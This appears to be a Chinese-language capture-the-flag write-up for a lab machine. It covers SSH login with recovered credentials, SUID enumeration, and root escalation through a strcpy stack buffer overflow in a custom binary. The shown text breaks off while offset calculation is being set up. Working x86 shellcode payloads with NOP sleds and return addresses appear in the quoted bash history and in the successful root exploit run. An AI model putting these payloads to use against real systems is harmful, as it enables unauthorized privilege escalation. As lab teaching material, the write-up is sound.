[user.zip] user.lst password: 
  inflating: user.lst                
                                                                                                                                                                                                          
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cat user.lst 
This file contain senstive information, therefore, should be always encrypted at rest.

buffemr - Iamgr00t

****** Only I can SSH in ************

感情我多此一举了,不需要解码,直接就拿来用,,,,

这里成功拿到buffemr - Iamgr00t

──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ssh buffemr@192.168.11.137
buffemr@192.168.11.137's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

81 packages can be updated.
1 update is a security update.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Jun 24 10:01:00 2021 from 10.0.0.154
buffemr@buffemr:~$ 

2.4.2 提权至root

成功登录buffemr,先做一波信息收集

buffemr@buffemr:~$ id
uid=1000(buffemr) gid=1000(buffemr) groups=1000(buffemr),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
buffemr@buffemr:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  user_flag.txt  Videos
buffemr@buffemr:~$ cat user_flag.txt 
    .-.    ))    wWw \\\  ///      wWw \\\    ///()_()                                                                 
  c(O_O)c (o0)-. (O)_((O)(O))      (O)_((O)  (O))(O o)                                                                 
 ,'.---.`, | (_))/ __)| \ ||       / __)| \  / |  |^_\                                                                 
/ /|_|_|\ \| .-'/ (   ||\\||      / (   ||\\//||  |(_))                                                                
| \_____/ ||(  (  _)  || \ |     (  _)  || \/ ||  |  /                                                                 
'. `---' .` \)  \ \_  ||  ||      \ \_  ||    ||  )|\\                                                                 
  `-...-'   (    \__)(_/  \_)      \__)(_/    \_)(/  \)                                                                
 wWw  wWw  oo_     wWw ()_()        c  c     .-.   \\\    /// ))   ()_()     .-.   \\\    ///wW  Ww oo_     wWw  _     
 (O)  (O) /  _)-<  (O)_(O o)        (OO)   c(O_O)c ((O)  (O))(o0)-.(O o)   c(O_O)c ((O)  (O))(O)(O)/  _)-<  (O)_/||_   
 / )  ( \ \__ `.   / __)|^_\      ,'.--.) ,'.---.`, | \  / |  | (_))|^_\  ,'.---.`, | \  / |  (..) \__ `.   / __)/o_)  
/ /    \ \   `. | / (   |(_))    / //_|_\/ /|_|_|\ \||\\//||  | .-' |(_))/ /|_|_|\ \||\\//||   ||     `. | / (  / |(\  
| \____/ |   _| |(  _)  |  /     | \___  | \_____/ ||| \/ ||  |(    |  / | \_____/ ||| \/ ||  _||_    _| |(  _) | | )) 
'. `--' .`,-'   | \ \_  )|\\     '.    ) '. `---' .`||    ||   \)   )|\\ '. `---' .`||    || (_/\_),-'   | \ \_ | |//  
  `-..-' (_..--'   \__)(/  \)      `-.'    `-...-' (_/    \_)  (   (/  \)  `-...-' (_/    \_)     (_..--'   \__)\__/   



COnGRATS !! lETs get ROOT now ....!!

成功拿到flag1

咱们查看一下用户可以访问的suid二进制程序

方法一 :find查找suid二进制程序

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

buffemr@buffemr:~$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22528 Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-- 1 root dip 378600 Jul 23  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 10232 Apr  8  2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 113528 Feb  2  2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /bin/umount
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /snap/core18/2066/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /snap/core18/2066/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/2066/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/2066/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/2066/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /snap/core18/2066/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /snap/core18/2074/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/2074/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/2074/bin/su
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /snap/core18/2074/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/2074/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/2074/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/2074/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/2074/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/2074/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /snap/core18/2074/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/2074/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Jul 10  2020 /snap/snapd/8542/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 111080 May 27  2021 /snap/snapd/12159/usr/lib/snapd/snap-confine
-rwsrwxr-x 1 root root 7700 Jun 23  2021 /opt/dontexecute

https://gtfobins.github.io/查找一下

未发现可以利用的,这里有个/usr/lib/policykit-1/polkit-agent-helper-1

还有一个/opt/dontexecute

方法二:suid3num.py使用

suid3num.py原脚本链接

本地监听

python -m http.server 8888                                                              

靶机下载

wget http://192.168.11.130:8888/suid3num.py

运行一下

buffemr@buffemr:~$ wget http://192.168.11.130:8888/suid3num.py
--2024-04-04 06:02:47--  http://192.168.11.130:8888/suid3num.py
Connecting to 192.168.11.130:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16632 (16K) [text/x-python]
Saving to: ‘suid3num.py’

suid3num.py                                        100%[==============================================================================================================>]  16.24K  --.-KB/s    in 0s      

2024-04-04 06:02:47 (64.9 MB/s) - ‘suid3num.py’ saved [16632/16632]

buffemr@buffemr:~$ python3 suid3num.py
  ___ _   _ _ ___    _____  _ _   _ __  __ 
 / __| | | / |   \  |__ / \| | | | |  \/  |
 \__ \ |_| | | |) |  |_ \ .` | |_| | |\/| |
 |___/\___/|_|___/  |___/_|\_|\___/|_|  |_|  twitter@syed__umar

[#] Finding/Listing all SUID Binaries ..
------------------------------
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/sudo
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/snap/core18/2066/bin/mount
/snap/core18/2066/bin/ping
/snap/core18/2066/bin/su
/snap/core18/2066/bin/umount
/snap/core18/2066/usr/bin/chfn
/snap/core18/2066/usr/bin/chsh
/snap/core18/2066/usr/bin/gpasswd
/snap/core18/2066/usr/bin/newgrp
/snap/core18/2066/usr/bin/passwd
/snap/core18/2066/usr/bin/sudo
/snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2066/usr/lib/openssh/ssh-keysign
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign
/snap/snapd/8542/usr/lib/snapd/snap-confine
/snap/snapd/12159/usr/lib/snapd/snap-confine
/opt/dontexecute
------------------------------


[!] Default Binaries (Don't bother)
------------------------------
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/sudo
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/snap/core18/2066/bin/mount
/snap/core18/2066/bin/ping
/snap/core18/2066/bin/su
/snap/core18/2066/bin/umount
/snap/core18/2066/usr/bin/chfn
/snap/core18/2066/usr/bin/chsh
/snap/core18/2066/usr/bin/gpasswd
/snap/core18/2066/usr/bin/newgrp
/snap/core18/2066/usr/bin/passwd
/snap/core18/2066/usr/bin/sudo
/snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2066/usr/lib/openssh/ssh-keysign
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign
/snap/snapd/8542/usr/lib/snapd/snap-confine
/snap/snapd/12159/usr/lib/snapd/snap-confine
------------------------------


[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/opt/dontexecute
------------------------------


[#] SUID Binaries found in GTFO bins..
------------------------------
[!] None :(
------------------------------

2.4.3 缓冲区溢出提权

查看一下history

buffemr@buffemr:~$ history
    1  sudo su
    2  su root
    3  reboot
    4  mysql -u root -p
    5  mysql -uroot -p
    6  su root
    7  mysql -u openemruser
    8  mysql -u openemruser -p
    9  ls
   10  cd /home/
   11  ls
   12  cd /mnt/
   13  sudo -l
   14  exit
   15  chmod 700 -R /home/buffemr/
   16  sudo su
   17  su root
   18  ls
   19  pwd
   20  ls
   21  curl https://www.danielmills.org/downloads/buffer_overflow/escalte.cpp -o nothing.cpp
   22  apt install curl
   23  sudo apt install curl
   24  wget https://www.danielmills.org/downloads/buffer_overflow/escalte.cpp
   25  ls
   26  reboot
   27  echo "san3ncrypt3d" | base64 
   28  apt install g++
   29  cd /mnt/
   30  exit
   31  ls
   32  cd Downloads/
   33  ls
   34  mv escalate.cpp /home/buffemr/
   35  cd /home/buffemr/
   36  ls
   37  mv escalate.cpp nothing.cpp
   38  ls
   39  su root
   40  ./dont_execute 
   41  ./dont_execute 12
   42  ./dont_execute `python -c 'print 
   43  A
   44  ./dont_execute `python -c 'print "A"*200'`
   45  sudo su
   46  su root
   47  ls
   48  g++ nothing.cpp -o nothing -m32 -fno-stack-protector -z execstack
   49  nano nothing.cpp 
   50  g++ nothing.cpp -o nothing -m32 -fno-stack-protector -z execstack
   51  su root
   52  cd /home/buffemr/
   53  ls
   54  cat user_flag.txt 
   55  ls
   56  ./dont_execute 400
   57  ./dont_execute 5000
   58  ./dont_execute `python -c 'print "A"*400'`
   59  ./dont_execute `python -c 'print "A"*200'`
   60  ./dont_execute `python -c 'print "A"*201'`
   61  ./dont_execute `python -c 'print "A"*208'`
   62  su root
   63  g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
   64  ls
   65  rm dontexecute.cpp 
   66  su root
   67  ls
   68  ls -la
   69  find -name don*
   70  find -name *don*
   71  locate dont*
   72  locate *dont*
   73  locate *dont* /opt/
   74  clear 
   75  ls
   76  cd Downloads/
   77  ls
   78  mv escalate.cpp dontexecute.cpp
   79  mv dontexecute.cpp /opt/
   80  cd /opt/
   81  ls
   82  nano dontexecute.cpp 
   83  ls
   84  rm dont_execute 
   85  ;s
   86  ls
   87  g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
   88  su root
   89  g++ escalate.cpp -o escalate -m32 -fno-stack-protector -z execstack
   90  g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
   91  ls
   92  su root
   93  nano dontexecute.cpp 
   94  ls
   95  g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
   96  ls
   97  su root
   98  ls
   99  gdb dontexecute 
  100  ls -la
  101  ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
  102  ls
  103  sudo ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
  104  ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
  105  cd /opt/
  106  ls
  107  ls -la
  108  ./dontexecute 
  109  ./dontexecute 1233
  110  strings dontexecute 
  111  ./dontexecute `python -c 'print "A" * 100'`
  112  ./dontexecute `python -c 'print "A" * 150'`
  113  ./dontexecute `python -c 'print "A" * 200'`
  114  ./dontexecute `python -c 'print "A" * 250'`
  115  ./dontexecute `python -c 'print "A" * 225'`
  116  ./dontexecute `python -c 'print "A" * 210'`
  117  ./dontexecute `python -c 'print "A" * 205'`
  118  ./dontexecute `python -c 'print "A" * 207'`
  119  ./dontexecute `python -c 'print "A" * 208'`
  120  gdb -q --args ./dontexecute `python -c 'print "A" * 208'`
  121  gdb -q --args ./dontexecute `python -c 'print "A" * 212'`
  122  gdb -q --args ./dontexecute `python -c 'print "A" * 216'`
  123  gdb -q --args ./dontexecute `python -c 'print "A" * 215'`
  124  gdb -q --args ./dontexecute `python -c 'print "A" * 215 + "BCDE"'`
  125  gdb -q --args ./dontexecute `python -c 'print "A" * 212 + "BCDE"'`
  126  python -c "print len('\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'"
  127  python -c "print len('\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')"
  128  python
  129  ./dontexecute `python -c ‘print “\x90”*157 + “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
  130  ./dontexecute `python -c ‘print “\x90”*157 + “\x31-c 'print "\x90"*157 + "\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
  131  ./dontexecute `python -c ‘rint “\x90”*157 + “\x31-c 'print "\x90"*157 + "\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
  132  gdb -q --args ./dontexecute `python -c ‘rint “\x90”*157 + “\x31-c 'print "\x90"*157 + "\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
  133  gdb dontexecute 
  134  ./dontexecute 
  135  gdb dontexecute 
  136  ls
  137  su root
  138  ls
  139  gdb danger
  140  ls
  141  ./danger 
  142  ./danger 11
  143  ./danger 122
  144  ./danger 
  145  ./danger hello
  146  gdb danger 
  147  ls
  148  rm danger 
  149  ls
  150  nano danger.cpp
  151  wget https://www.danielmills.org/downloads/buffer_overflow/escalate.cpp
  152  s
  153  ls
  154  mv escalate.cpp dontexecute.cpp
  155  su root
  156  gcc danger.c -o danger -fno-stack-protector -g -z execstack
  157  ls
  158  su root
  159  cd /opt/
  160  ls
  161  ls -la
  162  ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
  163  gdb dontexecute 
  164  ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xf0\xd6\xff\xff'")
  165  ./dontexecute `python -c 'print "\x90" * 457 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xf0\xd6\xff\xff"'`
  166  gdb dontexecute 
  167  https://github.com/san3ncrypt3d/shell-code-priv-esc
  168  ./dontexecute $(python -c 'print "\x90" * 459 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xa0\xd6\xff\xff"')
  169  exit
  170  cd /opt/
  171  ./dontexecute $(python -c 'print "\x90" * 459 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xa0\xd6\xff\xff"')
  172  cd /opt/
  173  ls
  174  rm dontexecute.cpp 
  175  ls
  176  ls -la
  177  cat /proc/sys/kernel/randomize_va_space 
  178  echo "0" > /proc/sys/kernel/randomize_va_space 
  179  sudo echo "0" > /proc/sys/kernel/randomize_va_space 
  180  su root
  181  cat /proc/sys/kernel/randomize_va_space 
  182  nano /etc/sysctl.d/01-disable-aslr.conf
  183  sudo nano /etc/sysctl.d/01-disable-aslr.conf
  184  su root
  185  cat /proc/sys/kernel/randomize_va_space 

这里可以发现历史命令中在使用dontexecute做提权测试,直接可以用命令操作一下

buffemr@buffemr:~$ cd /opt/
buffemr@buffemr:/opt$ ./dontexecute $(python -c 'print "\x90" * 459 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xa0\xd6\xff\xff"')
# id 
uid=0(root) gid=1000(buffemr) groups=1000(buffemr),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
# cd /root
# ls  
Root_flag.txt  snap
# cat Root_flag.txt
                                                                                                                                          
                                                                                                                                            
________                __  __                       ____                                  _____                                        ___ 
`MMMMMMMb.             69MM69MM                     6MMMMb                                69M`MM                                        `MM 
 MM    `Mb            6M' 6M' `                    8P    Y8                              6M' `MM                                         MM 
 MM     MM ___   ___ _MM__MM______  ___  __       6M      Mb ____    ___  ____  ___  __ _MM__ MM   _____  ____    _    ___  ____     ____MM 
 MM    .M9 `MM    MM MMMMMMMM6MMMMb `MM 6MM       MM      MM `MM(    )M' 6MMMMb `MM 6MM MMMMM MM  6MMMMMb `MM(   ,M.   )M' 6MMMMb   6MMMMMM 
 MMMMMMM(   MM    MM  MM  MM6M'  `Mb MM69 "       MM      MM  `Mb    d' 6M'  `Mb MM69 "  MM   MM 6M'   `Mb `Mb   dMb   d' 6M'  `Mb 6M'  `MM 
 MM    `Mb  MM    MM  MM  MMMM    MM MM'          MM      MM   YM.  ,P  MM    MM MM'     MM   MM MM     MM  YM. ,PYM. ,P  MM    MM MM    MM 
 MM     MM  MM    MM  MM  MMMMMMMMMM MM           MM      MM    MM  M   MMMMMMMM MM      MM   MM MM     MM  `Mb d'`Mb d'  MMMMMMMM MM    MM 
 MM     MM  MM    MM  MM  MMMM       MM           YM      M9    `Mbd'   MM       MM      MM   MM MM     MM   YM,P  YM,P   MM       MM    MM 
 MM    .M9  YM.   MM  MM  MMYM    d9 MM            8b    d8      YMP    YM    d9 MM      MM   MM YM.   ,M9   `MM'  `MM'   YM    d9 YM.  ,MM 
_MMMMMMM9'   YMMM9MM__MM__MM_YMMMM9 _MM_            YMMMM9        M      YMMMM9 _MM_    _MM_ _MM_ YMMMMM9     YP    YP     YMMMM9   YMMMMMM_
                                                                                                                                            
                                                                                                                                            
                                                                                                                                            
                                                                                                                                            
                                                                                                                                            
________                                           ___        8   8                                                                         
`MMMMMMMb.                                         `MM       (M) (M)                                                                        
 MM    `Mb                      /                   MM       (M) (M)                                                                        
 MM     MM   _____     _____   /M      ____     ____MM       (M) (M)                                                                        
 MM     MM  6MMMMMb   6MMMMMb /MMMMM  6MMMMb   6MMMMMM        M   M                                                                         
 MM    .M9 6M'   `Mb 6M'   `Mb MM    6M'  `Mb 6M'  `MM        M   M                                                                         
 MMMMMMM9' MM     MM MM     MM MM    MM    MM MM    MM        M   M                                                                         
 MM  \M\   MM     MM MM     MM MM    MMMMMMMM MM    MM        8   8                                                                         
 MM   \M\  MM     MM MM     MM MM    MM       MM    MM                                                                                      
 MM    \M\ YM.   ,M9 YM.   ,M9 YM.  ,YM    d9 YM.  ,MM       68b 68b                                                                        
_MM_    \M\_YMMMMM9   YMMMMM9   YMMM9 YMMMM9   YMMMMMM_      Y89 Y89  


COngratulations !!! Tweet me at @san3ncrypt3d ! 

成功提权至root权限,并拿到flag2

2.4.4 strcpy溢出原理学习

上边那个只是为了拿到flag,下边咱们学习一下缓冲区溢出提权

buffemr@buffemr:~$ strings /opt/dontexecute 
/lib/ld-linux.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
_ZSt4cout
_ZNSt8ios_base4InitD1Ev
_ZNSt8ios_base4InitC1Ev
libc.so.6
_IO_stdin_used
strcpy
__cxa_atexit
__cxa_finalize
__libc_start_main
GLIBCXX_3.4
GLIBC_2.0
GLIBC_2.1.3
UWVS
[^_]
Usage: ./dontexecute argument
;*2$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7283
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
dontexecute.cpp
_ZStL19piecewise_construct
_ZStL8__ioinit
_Z41__static_initialization_and_destruction_0ii
_GLOBAL__sub_I__Z10vulnerablePc
__FRAME_END__
__GNU_EH_FRAME_HDR
_DYNAMIC
__init_array_end
__init_array_start
_GLOBAL_OFFSET_TABLE_
__cxa_finalize@@GLIBC_2.1.3
__x86.get_pc_thunk.ax
_edata
_IO_stdin_used
_fp_hw
main
__dso_handle
__cxa_atexit@@GLIBC_2.1.3
__x86.get_pc_thunk.bx
__libc_start_main@@GLIBC_2.0
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4
__TMC_END__
_ZSt4cout@@GLIBCXX_3.4
__data_start
__x86.get_pc_thunk.dx
__bss_start
_ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4
__libc_csu_init
_ITM_deregisterTMCloneTable
__libc_csu_fini
__gmon_start__
strcpy@@GLIBC_2.0
_ITM_registerTMCloneTable
_ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

可以发现dontexecute使用了strcpy函数。

缓冲区溢出之Strcpy和Memcpy

strcpy溢出原理

strcpy(a,b),如果将长度较大的值 b 赋值给 较短的值 a(b>a),那么strcpy之后,b多出来将一部分将会覆盖原来的内存单元。当溢出的值刚好覆盖了 函数结束后 ret 返回的地址时,那么函数 ret后将会执行 溢出的值。

所以这里咱们可以尝试利用缓冲区溢出来运行shell代码获取root权限

这里因为需要尝试利用缓冲区溢出,得先看看该机器是否有ASLR保护

buffemr@buffemr:/opt$ cat /proc/sys/kernel/randomize_va_space
0

发现该机器ASLR保护是关的

如何关闭可以参考改文章:linux关闭ASLR

metasploit 中的 pattern_create.rb 生成数量 1000 的字符串用来计算偏移量

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cd /usr/share/metasploit-framework/tools/exploit 
                                                                                         
┌──(root㉿MYsec)-[/usr/share/metasploit-framework/tools/exploit]
└─# ./pattern_create.rb -l 1000
